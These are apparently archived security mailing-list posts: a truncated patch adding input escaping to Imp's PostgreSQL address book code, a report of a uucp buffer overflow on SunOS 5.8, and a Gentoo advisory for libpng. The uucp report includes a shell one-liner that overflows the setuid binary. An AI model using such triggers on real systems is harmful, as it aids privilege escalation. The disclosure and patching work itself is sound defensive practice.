hope our user community doesn't notice. It's a lot easier for us to patch-in-place to deal with the bug itself, and leave the upgrade to new features (and new bugs!) to be done in a more coordinated fashion, with time for users to evaluate the new interface, etc. That being said, and thanks to the information in Jouko's advisory, I've patched our own Imp installation (which has now had so many patches applied I should start giving it local version numbers!) according to the appended. I hope others will be able to make use of this patch, and I especially hope that if I've overlooked something, others will point it out... -- -- Sylvain Robitaille [EMAIL PROTECTED] Systems analyst Concordia University Instructional & Information TechnologyMontreal, Quebec, Canada -- # Of course, folks using Imp-2 with non-PostgreSQL databases will # need to adapt the following to the appropriate db.* file --- lib/db.pgsql.20030108 2000-12-20 15:45:33.0 -0500 +++ lib/db.pgsql 2003-01-08 15:18:25.0 -0500 @@ -26,6 +26,13 @@ function imp_add_address ($address, $nickname, $fullname, $user, $server) { global $default; +/* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ +$address = addslashes($address); +$nickname = addslashes($nickname); +$fullname = addslashes($fullname); +$user = addslashes($user); +$server = addslashes($server); + /* post: adds $address, $nickname, $fullname to the addressbook for $user@$server returns true on success and false on failure */ @@ -41,6 +48,10 @@ function imp_check_prefs ($user, $server) { global $_imp_prefs_exist, $default; +/* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ +$user = addslashes($user); +$server = addslashes($server); + if (isset($_imp_prefs_exist)) { return $_imp_prefs_exist; } @@ -59,6 +70,11 @@ function imp_delete_address ($address, $user, $server) { global $default; + /* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ + $address = addslashes($address); + $user = addslashes($user); + $server = addslashes($server); + /* post: deletes $address from the addressbook of $user@$server returns true on success and false on failure */ @@ -72,6 +88,10 @@ function imp_get_addresses ($user, $server) { global $default; + /* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ + $user = addslashes($user); + $server = addslashes($server); + /* post: returns a 2d array of addresses where each element is an array in which element 0 is the address, element 1 is the nickname, and element 2 is the fullname. @@ -92,6 +112,10 @@ function imp_get_from ($user, $server) { global $default; + /* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ + $user = addslashes($user); + $server = addslashes($server); + /* post: returns the signature for the database key $user@$server (a string), or false on failure. */ @@ -105,6 +129,10 @@ function imp_get_fullname ($user, $server) { global $default; + /* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ + $user = addslashes($user); + $server = addslashes($server); + /* post: returns the signature for the database key $user@$server (a string), or false on failure. */ @@ -118,6 +146,10 @@ function imp_get_lang ($user, $server) { global $default; + /* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ + $user = addslashes($user); + $server = addslashes($server); + /* post: returns the signature for the database key $user@$server (a string), or false on failure. */ @@ -1
Buffer Overflow in uucp of SunOS 5.8
Hi everybody Though I dont know if this vulnerability has be discovered previously I found a buffer overflow in the app uucp of SunOS 5.8 that it could be used to get privileges of uucp. Buffer is overflow when the app uucp is executed with the parameter -s continued of a string bigger than 7525 bytes. hipnosis% uucp -s `perl -e 'print "A"x7526'` Segmentation Fault hipnosis% uucp -s `perl -e 'print "A"x7525'` hipnosis% I have not been able to debug the app for see if the registers are overwrites because i have not any debugger in my machine and i have not too time. My system: hipnosis% uname -a SunOS averroes 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250 hipnosis% Suid: hipnosis% ls -l /usr/bin/uucp ---s--x--x 1 uucp uucp 66940 eno 5 2000 /usr/bin/uucp hipnosis% Well, bye everybody
GLSA: libpng
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT 200301-7 - - PACKAGE : libpng SUMMARY : buffer overflow DATE : 2003-01-08 15:01 UTC EXPLOIT : remote - - - From Debian Security Advisory DSA 213-1: "Glenn Randers-Pehrson discovered a problem in connection with 16-bit samples from libpng, an interface for reading and writing PNG (Portable Network Graphics) format files. The starting offsets for the loops are calculated incorrectly which causes a buffer overrun beyond the beginning of the row buffer." Read the full advisory at http://www.debian.org/security/2002/dsa-213 SOLUTION It is recommended that all Gentoo Linux users who are running media-libs/libpng-1.2.5-r1 or earlier update their systems as follows: emerge rsync emerge libpng If you also have libpng-1.0.12-r1 or earlier installed update your system as follows: emerge \=media-libs/libpng-1.0.12-r2 Finish with: emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+HEShfT7nyhUpoZMRAvoiAKCKhtJz+FVEW84Zr+NDEQ5xYcqf7gCgxLZ8 teSWsNMM8ls6TU7MfX7/lyM= =bhV+ -END PGP SIGNATURE-